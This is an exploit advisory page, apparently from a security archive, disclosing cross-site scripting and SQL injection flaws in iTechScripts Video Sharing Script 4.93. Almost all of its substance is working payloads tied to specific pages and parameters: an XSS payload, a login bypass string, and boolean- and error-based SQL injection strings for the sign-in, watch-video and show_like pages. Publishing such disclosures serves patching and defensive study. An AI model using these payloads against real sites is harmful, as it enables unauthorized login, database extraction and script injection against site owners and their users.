iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection: Posted Jan 18, 2017; Authored by Hasan Emre Ozer; iTechScripts Video Sharing Script version 4.93 suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | f8f26c8cff785165056ce43d50ede1b607c404fce7a58bbca31b4c5e4bdf95de; Download | Favorite | View

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

Exploit Title : Video Sharing Script v4.93 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/video-sharing-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $250
http://video-sharing.itechscripts.com
<http://photo-sharing.itechscripts.com/>

--------------------------------------------------------

Type: Self XSS
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters : usr_name
Method: POST
Payload:"><img src=i onerror=prompt(1)>
--------------------------------------------------------
Type: Login Bypass
Vulnerable URL: http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' OR '1'='1

--------------------------------------------------------

Type: Boolean  Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL
--------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/watch-video.php
<http://localhost/%5BPATH%5D/list_temp_photo_pin_upload.php>
Vulnerable Parameters: v
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl

--------------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/show_like.php
<http://localhost/%5BPATH%5D/list_temp_photo_pin_upload.php>
Vulnerable Parameters: vid
Method: GET
Payload: ' AND (SELECT 6330 FROM(SELECT
COUNT(*),CONCAT(0x7170787871,(SELECT
(ELT(6330=6330,1))),0x71767a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- jvSl
--------------------------------------------------------

Type: Boolean  Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/sign-in.php
Vulnerable Parameters: usr_password
Method: POST
Payload: ' RLIKE (SELECT (CASE WHEN (5118=5118) THEN 0x66616661 ELSE 0x28
END))-- kwfL

-- 
Best Regards,
Hasan Emre

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

Share This

iTechScripts Video Sharing Script 4.93 Cross Site Scripting / SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems